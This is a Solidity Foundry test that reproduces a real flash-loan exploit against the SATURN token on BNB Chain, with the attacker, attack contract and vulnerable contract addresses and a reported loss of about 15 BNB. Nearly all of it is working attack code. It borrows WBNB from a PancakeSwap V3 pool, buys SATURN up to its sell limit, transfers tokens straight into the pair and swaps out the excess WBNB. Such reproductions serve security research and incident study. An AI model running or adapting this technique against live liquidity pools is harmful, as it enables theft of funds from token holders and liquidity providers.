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SATURN_exp.sol
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SATURN_exp.sol
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// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "../interface.sol";
// @KeyInfo - Total Lost : ~15 BNB
// Attacker : 0xc468D9A3a5557BfF457586438c130E3AFbeC2ff9
// Attack Contract : 0xfcECDBC62DEe7233E1c831D06653b5bEa7845FcC
// Vulnerable Contract : 0x9BDF251435cBC6774c7796632e9C80B233055b93
// Attack Tx : https://bscscan.com/tx/0x948132f219c0a1adbffbee5d9dc63bec676dd69341a6eca23790632cb9475312
// @Info
// Vulnerable Contract Code : https://bscscan.com/address/0x9BDF251435cBC6774c7796632e9C80B233055b93#code
contract ContractTest is Test {
address public attacker = address(this);
address public SATURN_creater = 0xc8Ce1ecDfb7be4c5a661DEb6C1664Ab98df3Cd62;
address internal holderOfToken = 0xfcECDBC62DEe7233E1c831D06653b5bEa7845FcC;
Uni_Pair_V3 pancakeV3Pool = Uni_Pair_V3(0x36696169C63e42cd08ce11f5deeBbCeBae652050);
IPancakePair pair_WBNB_SATURN = IPancakePair(0x49BA6c20D3e95374fc1b19D537884b5595AA6124);
IPancakeRouter router = IPancakeRouter(payable(0x10ED43C718714eb63d5aA57B78B54704E256024E));
IERC20 constant SATURN = IERC20(0x9BDF251435cBC6774c7796632e9C80B233055b93);
IERC20 constant BUSD = IERC20(0x55d398326f99059fF775485246999027B3197955);
IWBNB constant WBNB = IWBNB(payable(0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c));
uint256 flashAmt = 3300 ether;
uint256 finalSaturnSellAmt = 228_832_951_945_080_091_523_153;
modifier balanceLog() {
emit log_named_decimal_uint("Attacker WBNB Balance Before exploit", WBNB.balanceOf(address(this)), 18);
_;
emit log_named_decimal_uint("Attacker WBNB Balance After exploit", WBNB.balanceOf(address(this)), 18);
}
function setUp() public {
vm.createSelectFork("bsc", 38_488_209 - 1);
vm.label(address(SATURN), "SATURN");
vm.label(address(WBNB), "WBNB");
vm.label(address(router), "PancakeSwap Router");
vm.label(address(pair_WBNB_SATURN), "pair_WBNB_SATURN");
vm.label(address(pancakeV3Pool), "pancakeV3Pool");
}
function approveAll() public {
SATURN.approve(address(router), type(uint256).max);
WBNB.approve(address(router), type(uint256).max);
}
function EnableSwitch(
bool state
) internal {
vm.prank(SATURN_creater);
address(SATURN).call(abi.encodeWithSignature("setEnableSwitch(bool)", state));
}
function testExploit() public balanceLog {
approveAll();
// init saturn token
EnableSwitch(false);
vm.startPrank(holderOfToken);
SATURN.transfer(attacker, SATURN.balanceOf(holderOfToken));
vm.stopPrank();
EnableSwitch(true);
// start attack
pancakeV3Pool.flash(attacker, 0, flashAmt, bytes(""));
}
function pancakeV3FlashCallback(uint256 fee0, uint256 fee1, bytes calldata data) external {
// Get the everyTimeSellLimitAmount from the SATURN contract
uint256 limit = getEveryTimeSellLimitAmount();
// Get the current balance of SATURN in the pair_WBNB_SATURN pool
uint256 amount = SATURN.balanceOf(address(pair_WBNB_SATURN));
// Define the swap paths
address[] memory buyPath = getPath(address(WBNB), address(SATURN));
address[] memory sellPath = getPath(address(SATURN), address(WBNB));
// Calculate the amount of WBNB needed to swap for SATURN
uint256[] memory amounts = router.getAmountsIn(amount - limit, buyPath);
// Swap WBNB for SATURN and send the SATURN to the SATURN_creater
swapExactTokensForTokens(amounts[0], buyPath);
// Update the amount of SATURN in the pair_WBNB_SATURN pool
amount = SATURN.balanceOf(address(pair_WBNB_SATURN));
// Move the block number forward by 1
vm.roll(block.number + 1);
// Transfer a specific amount of SATURN to the pair_WBNB_SATURN pool
SATURN.transfer(address(pair_WBNB_SATURN), finalSaturnSellAmt);
// Get the current reserves of SATURN and WBNB in the pair_WBNB_SATURN pool
(uint256 SATURN_reserve, uint256 WBNB_reserve,) = pair_WBNB_SATURN.getReserves();
// Update the amount of SATURN in the pair_WBNB_SATURN pool
amount = SATURN.balanceOf(address(pair_WBNB_SATURN));
// Calculate the amount of WBNB that will be received when swapping SATURN
amounts = router.getAmountsOut(amount - SATURN_reserve, sellPath);
// Perform the swap in the pair_WBNB_SATURN pool and send the WBNB to the attacker
pair_WBNB_SATURN.swap(0, amounts[1], attacker, bytes(""));
// Transfer WBNB to the pancakeV3Pool, including the fee
WBNB.transfer(address(pancakeV3Pool), flashAmt + fee1);
}
function getEveryTimeSellLimitAmount() internal returns (uint256) {
(, bytes memory result) = address(SATURN).call(abi.encodeWithSignature("everyTimeSellLimitAmount()"));
return abi.decode(result, (uint256));
}
function swapExactTokensForTokens(uint256 amountIn, address[] memory path) internal {
router.swapExactTokensForTokens(amountIn, 0, path, SATURN_creater, type(uint256).max);
}
function getPath(address token0, address token1) internal pure returns (address[] memory) {
address[] memory path = new address[](2);
path[0] = token0;
path[1] = token1;
return path;
}
fallback() external payable {}
}